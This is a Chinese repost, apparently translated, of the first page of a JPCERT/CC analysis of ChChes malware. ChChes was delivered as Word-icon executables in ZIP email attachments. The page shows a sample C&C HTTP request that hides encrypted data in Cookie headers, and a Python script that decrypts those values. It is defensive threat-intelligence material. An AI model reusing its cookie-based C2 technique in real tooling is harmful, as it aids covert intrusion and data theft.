欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

ChChes – 使用Cookie头与C&C服务器通信的恶意软件

来源:jpcert.or.jp 作者:啦咔呢 时间:2017-03-14 TAG: 我要投稿

 ChChes – 使用Cookie头与C&C服务器通信的恶意软件


自2016年10月以来,JPCERT/CC已经确认了发送到日本组织的电子邮件中,包含着一个带有可执行文件的ZIP附件。这些邮件假冒真实存在的发送人,从日本境内一个免费的邮件地址服务器发送。另外,这个可执行文件的图标伪装成为Word文档。当收件人执行文件时,计算机就感染了名叫ChChes的恶意软件。

因此,这篇博客文章将会着重介绍ChChes的特性,包括它的通讯。

附加到目标邮件的ZIP文件


在这个案例中,虽然附加到目标邮件的一些ZIP文件中仅包含了可执行文件,但在某些情况下,它们也还包含着一些伪造的Word文档。下面是后一种情况的例子。

/Article/UploadPic/2017-3/2017314115441909.png

图1:附加ZIP文件示例

在上面的示例中,列出了两个具有相似名称的文件:一个伪造的Word文档和一个图标伪装成Word文档的可执行文件。通过运行此可执行文件,机器将会感染ChChes病毒。JPCERT / CC已确认这个可执行文件是经过特定签名证书签发的。伪造Word文档是无害的,它是一篇名叫“为什么唐纳德•特朗普会获胜”的在线文章。代码签名证书的详细信息会在附录A中描述。

ChChes的通讯


ChChes是一种恶意软件,它使用HTTP与特定站点通信以接收命令和模块。ChChes本身可以执行的函数很少。这意味着它通过从C&C服务器接收模块并将其加载到内存上来扩展其功能。

以下是ChChes发送的HTTP GET请求的示例。有时,使用HEAD方法而不是GET。

1
2
3
4
5
6
7
8
GET /X4iBJjp/MtD1xyoJMQ.htm HTTP/1.1
Cookie: uHa5=kXFGd3JqQHMfnMbi9mFZAJHCGja0ZLs%3D;KQ=yt%2Fe(omitted)
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: [user agent]
Host: [host name]
Connection: Keep-Alive
Cache-Control: no-cache

可以看到,HTTP请求的路径采用/ [随机字符串] .htm,但是,Cookie字段的值不是随机的,而是与C&C服务器通信中使用的实际数据对应的加密字符串。该值可以使用以下Python脚本解密。

1
2
3
4
5
6
7
8
9
10
11
12
13
data_list = cookie_data.split(';')
dec = []
for i in range(len(data_list)):
    tmp = data_list[i]
    pos = tmp.find("=")
    key = tmp[0:pos]
    val = tmp[pos:]
    md5 = hashlib.md5()
    md5.update(key)
    rc4key = md5.hexdigest()[8:24]
    rc4 = ARC4.new(rc4key)
    dec.append(rc4.decrypt(val.decode("base64"))[len(key):])
print("[*] decoded: " + "".join(dec))

以下是机器感染后的通信流程。

/Article/UploadPic/2017-3/2017314115441547.jpg

图2通讯流程

第一个请求


ChChes首次发送的HTTP请求(请求1)的Cookie字段中的值包含以“A”开头的加密数据。以下是发送数据的示例。

/Article/UploadPic/2017-3/2017314115441610.jpg

图3:第一个数据发送的示例

如图3所示,发送的数据包含着计算机名称的信息。加密数据的格式因ChChes的版本而异。详情载于附录B。

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载